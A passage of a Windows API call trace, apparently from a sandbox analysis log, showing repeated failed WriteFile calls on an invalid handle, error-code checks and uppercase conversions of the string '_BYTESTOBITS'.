lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.010] GetLastError () returned 0x6 [0027.010] GetLastError () returned 0x6 [0027.010] SetLastError (dwErrCode=0x6) [0027.010] GetLastError () returned 0x6 [0027.010] SetLastError (dwErrCode=0x6) [0027.011] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.011] GetLastError () returned 0x6 [0027.011] SetLastError (dwErrCode=0x6) [0027.011] GetLastError () returned 0x6 [0027.011] SetLastError (dwErrCode=0x6) [0027.011] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.011] GetLastError () returned 0x6 [0027.011] GetLastError () returned 0x6 [0027.011] SetLastError (dwErrCode=0x6) [0027.011] GetLastError () returned 0x6 [0027.011] SetLastError (dwErrCode=0x6) [0027.011] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.011] GetLastError () returned 0x6 [0027.011] SetLastError (dwErrCode=0x6) [0027.012] GetLastError () returned 0x6 [0027.012] SetLastError (dwErrCode=0x6) [0027.012] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.012] GetLastError () returned 0x6 [0027.012] GetLastError () returned 0x6 [0027.012] SetLastError (dwErrCode=0x6) [0027.012] GetLastError () returned 0x6 [0027.012] SetLastError (dwErrCode=0x6) [0027.012] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.012] GetLastError () returned 0x6 [0027.012] SetLastError (dwErrCode=0x6) [0027.012] GetLastError () returned 0x6 [0027.012] SetLastError (dwErrCode=0x6) [0027.012] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.012] GetLastError () returned 0x6 [0027.012] GetLastError () returned 0x6 [0027.012] SetLastError (dwErrCode=0x6) [0027.012] GetLastError () returned 0x6 [0027.012] SetLastError (dwErrCode=0x6) [0027.013] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.013] GetLastError () returned 0x6 [0027.013] SetLastError (dwErrCode=0x6) [0027.013] GetLastError () returned 0x6 [0027.013] SetLastError (dwErrCode=0x6) [0027.013] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.013] GetLastError () returned 0x6 [0027.013] GetLastError () returned 0x6 [0027.013] SetLastError (dwErrCode=0x6) [0027.013] GetLastError () returned 0x6 [0027.013] SetLastError (dwErrCode=0x6) [0027.013] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.013] GetLastError () returned 0x6 [0027.013] SetLastError (dwErrCode=0x6) [0027.013] GetLastError () returned 0x6 [0027.014] SetLastError (dwErrCode=0x6) [0027.014] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.014] GetLastError () returned 0x6 [0027.014] GetLastError () returned 0x6 [0027.014] SetLastError (dwErrCode=0x6) [0027.014] GetLastError () returned 0x6 [0027.014] SetLastError (dwErrCode=0x6) [0027.014] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.014] GetLastError () returned 0x6 [0027.014] SetLastError (dwErrCode=0x6) [0027.014] GetLastError () returned 0x6 [0027.014] SetLastError (dwErrCode=0x6) [0027.014] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.014] GetLastError () returned 0x6 [0027.014] GetLastError () returned 0x6 [0027.014] SetLastError (dwErrCode=0x6) [0027.014] GetLastError () returned 0x6 [0027.014] SetLastError (dwErrCode=0x6) [0027.015] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.015] GetLastError () returned 0x6 [0027.015] SetLastError (dwErrCode=0x6) [0027.015] GetLastError () returned 0x6 [0027.015] SetLastError (dwErrCode=0x6) [0027.015] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.015] GetLastError () returned 0x6 [0027.015] GetLastError () returned 0x6 [0027.015] SetLastError (dwErrCode=0x6) [0027.015] GetLastError () returned 0x6 [0027.015] SetLastError (dwErrCode=0x6) [0027.015] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.015] GetLastError () returned 0x6 [0027.015] SetLastError (dwErrCode=0x6) [0027.015] GetLastError () returned 0x6 [0027.016] SetLastError (dwErrCode=0x6) [0027.016] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.016] GetLastError () returned 0x6 [0027.016] GetLastError () returned 0x6 [0027.016] SetLastError (dwErrCode=0x6) [0027.016] GetLastError () returned 0x6 [0027.016] SetLastError (dwErrCode=0x6) [0027.016] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.016] GetLastError () returned 0x6 [0027.016] SetLastError (dwErrCode=0x6) [0027.016] GetLastError () returned 0x6 [0027.016] SetLastError (dwErrCode=0x6) [0027.016] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.016] GetLastError () returned 0x6 [0027.016] GetLastError () returned 0x6 [0027.016] SetLastError (dwErrCode=0x6) [0027.016] GetLastError () returned 0x6 [0027.016] SetLastError (dwErrCode=0x6) [0027.017] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.017] GetLastError () returned 0x6 [0027.017] SetLastError (dwErrCode=0x6) [0027.017] GetLastError () returned 0x6 [0027.017] SetLastError (dwErrCode=0x6) [0027.017] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.017] GetLastError () returned 0x6 [0027.017] GetLastError () returned 0x6 [0027.017] SetLastError (dwErrCode=0x6) [0027.017] GetLastError () returned 0x6 [0027.017] SetLastError (dwErrCode=0x6) [0027.017] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.018] GetLastError () returned 0x6 [0027.018] SetLastError (dwErrCode=0x6) [0027.018] GetLastError () returned 0x6 [0027.018] SetLastError (dwErrCode=0x6) [0027.018] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.018] GetLastError () returned 0x6 [0027.018] GetLastError () returned 0x6 [0027.018] SetLastError (dwErrCode=0x6) [0027.018] GetLastError () returned 0x6 [0027.018] SetLastError (dwErrCode=0x6) [0027.018] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.018] GetLastError () returned 0x6 [0027.018] SetLastError (dwErrCode=0x6) [0027.018] GetLastError () returned 0x6 [0027.019] SetLastError (dwErrCode=0x6) [0027.019] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.019] GetLastError () returned 0x6 [0027.019] GetLastError () returned 0x6 [0027.019] SetLastError (dwErrCode=0x6) [0027.019] GetLastError () returned 0x6 [0027.019] SetLastError (dwErrCode=0x6) [0027.019] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.019] GetLastError () returned 0x6 [0027.019] SetLastError (dwErrCode=0x6) [0027.019] GetLastError () returned 0x6 [0027.019] SetLastError (dwErrCode=0x6) [0027.019] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.019] GetLastError () returned 0x6 [0027.019] GetLastError () returned 0x6 [0027.019] SetLastError (dwErrCode=0x6) [0027.019] GetLastError () returned 0x6 [0027.019] SetLastError (dwErrCode=0x6) [0027.020] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.020] GetLastError () returned 0x6 [0027.020] SetLastError (dwErrCode=0x6) [0027.020] GetLastError () returned 0x6 [0027.020] SetLastError (dwErrCode=0x6) [0027.020] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.020] GetLastError () returned 0x6 [0027.020] GetLastError () returned 0x6 [0027.020] SetLastError (dwErrCode=0x6) [0027.020] GetLastError () returned 0x6 [0027.020] SetLastError (dwErrCode=0x6) [0027.020] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.021] GetLastError () returned 0x6 [0027.021] SetLastError (dwErrCode=0x6) [0027.021] GetLastError () returned 0x6 [0027.021] SetLastError (dwErrCode=0x6) [0027.021] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.021] GetLastError () returned 0x6 [0027.021] GetLastError () returned 0x6 [0027.021] SetLastError (dwErrCode=0x6) [0027.021] GetLastError () returned 0x6 [0027.021] SetLastError (dwErrCode=0x6) [0027.021] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.021] GetLastError () returned 0x6 [0027.021] SetLastError (dwErrCode=0x6) [0027.021] GetLastError () returned 0x6 [0027.021] SetLastError (dwErrCode=0x6) [0027.021] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.021] GetLastError () returned 0x6 [0027.021] GetLastError () returned 0x6 [0027.021] SetLastError (dwErrCode=0x6) [0027.021] GetLastError () returned 0x6 [0027.021] SetLastError (dwErrCode=0x6) [0027.022] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.022] GetLastError () returned 0x6 [0027.022] SetLastError (dwErrCode=0x6) [0027.022] GetLastError () returned 0x6 [0027.022] SetLastError (dwErrCode=0x6) [0027.022] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.022] GetLastError () returned 0x6 [0027.022] GetLastError () returned 0x6 [0027.022] SetLastError (dwErrCode=0x6) [0027.022] GetLastError () returned 0x6 [0027.022] SetLastError (dwErrCode=0x6) [0027.022] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.022] GetLastError () returned 0x6 [0027.023] SetLastError (dwErrCode=0x6) [0027.023] GetLastError () returned 0x6 [0027.023] SetLastError (dwErrCode=0x6) [0027.023] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.023] GetLastError () returned 0x6 [0027.023] GetLastError () returned 0x6 [0027.023] SetLastError (dwErrCode=0x6) [0027.023] GetLastError () returned 0x6 [0027.023] SetLastError (dwErrCode=0x6) [0027.023] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.023] GetLastError () returned 0x6 [0027.023] SetLastError (dwErrCode=0x6) [0027.023] GetLastError () returned 0x6 [0027.023] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.023] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.024] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.024] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.024] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.024] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.024] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.024] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.024] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.024] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.025] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.025] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.025] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.025] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.025] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.025] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.025] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.026] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.026] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.026] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.026] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.026] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.026] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.026] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.031] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.031] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.031] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.031] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.031] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.031] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.031] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.031] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.034] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.034] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.034] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.034] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.034] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.034] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.034] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.034] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.038] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.038] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.038] CharUpperBuffW (in: 